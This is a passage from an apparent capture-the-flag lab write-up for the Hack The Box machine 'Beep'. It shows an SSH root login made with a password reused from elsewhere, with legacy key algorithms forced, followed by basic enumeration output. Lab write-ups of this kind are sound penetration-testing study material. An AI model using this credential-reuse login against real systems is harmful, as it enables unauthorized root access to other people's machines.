SSH
┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ sshpass -pjEhdIekWmdjE ssh root@$IP -oKexAlgorithms=+diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss,ssh-rsa
The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established.
dsa key fingerprint is sha256:AGaW4a0uNJ7KPMpSOBD+aVIN75AV3C0y8yKpqFjedTc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
last login: Tue Jul 16 11:45:47 2019
Welcome to Elastix
----------------------------------------------------
To access your Elastix System, using a separate workstation (PC/MAC/Linux)
open the internet browser using the following url:
http://10.10.10.7
[root@beep ~]# whoami
root
[root@beep ~]# hostname
beep
[root@beep ~]# ifconfig
eth0 link encap:Ethernet HWaddr 00:50:56:B9:54:75
inet addr:10.10.10.7 Bcast:10.10.10.255 Mask:255.255.255.0
up broadcast running multicast mtu:1500 Metric:1
rx packets:349 errors:0 dropped:0 overruns:0 frame:0
tx packets:318 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:60263 (58.8 KiB) TX bytes:74652 (72.9 KiB)
interrupt:59 Base address:0x2024
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
up loopback running mtu:16436 Metric:1
rx packets:1485 errors:0 dropped:0 overruns:0 frame:0
tx packets:1485 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
rx bytes:250988 (245.1 KiB) TX bytes:250988 (245.1 KiB)Password reuse for the root user
Initial Foothold established as root
System Level Compromise